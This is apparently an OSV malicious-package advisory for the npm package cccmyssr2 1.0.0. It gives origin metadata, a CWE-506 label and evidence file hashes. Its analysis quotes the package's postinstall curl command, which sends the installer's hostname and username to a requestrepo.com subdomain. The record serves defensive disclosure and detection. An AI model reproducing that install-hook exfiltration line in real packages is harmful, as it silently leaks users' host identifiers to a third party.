-= Per source details. Do not edit below this line.=-
On npm install, the package's postinstall.js executes curl "http://r1x55270.requestrepo.com/pre?h=$(hostname)&u=$(whoami)", transmitting the installer's hostname and username over plain HTTP to an attacker-controlled requestrepo.com subdomain (a known DNS/HTTP exfiltration canary service). The package otherwise has no real functionality: index.js is a trivial 3-line date stub, package.json carries placeholder metadata ("A harmless utility package", empty author). The lifecycle hook fires automatically during install without consent, leaking host identifiers to a third party. This is the standard install-time reconnaissance/exfiltration shape.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-007440",
"import_time": "2026-06-24T15:01:18.165507252Z",
"modified_time": "2026-06-24T14:07:34Z",
"sha256": "bd052408bb36e56e940e50ba81f7054844bc91dc0b32eaead5d15ca67f9b5c03",
"source": "amazon-inspector",
"versions": [
"1.0.0"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "postinstall.js",
"sha256": "82b3b4ccf531cf849693156557795aed99763487a1cb57de999bae846392fb47",
"tlsh": "0fb02ba21a880620fa00d0803c70536b7453d350e30805d0d8000040314c0cb0253fe5"
},
{
"path": "package.json",
"sha256": "842b1ee3fcfaa3be31e2915f8876ec7fe3254a104f3bd04e7250af1448c46884",
"tlsh": "e9d0a7244e21967334c05b5a1a13454675255d5b01147c1c17d7190c53de37344ff319"
}
],
"package_integrity": [
{
"filename": "cccmyssr2-1.0.0.tgz",
"hashes": {
"sha1": "4e60c743f679f477bada8365f6ffbd36b5bfa528",
"sha512_sri": "sha512-uuKZzhcsRM5v4DI0kBM1hYcvTN7BLkXtyTab5RRTTcTqD/qyfZPjs8vsVvj8duqCzTFXLhFE5QhSSreCSEuRlA=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/cccmyssr2/MAL-2026-6391.json"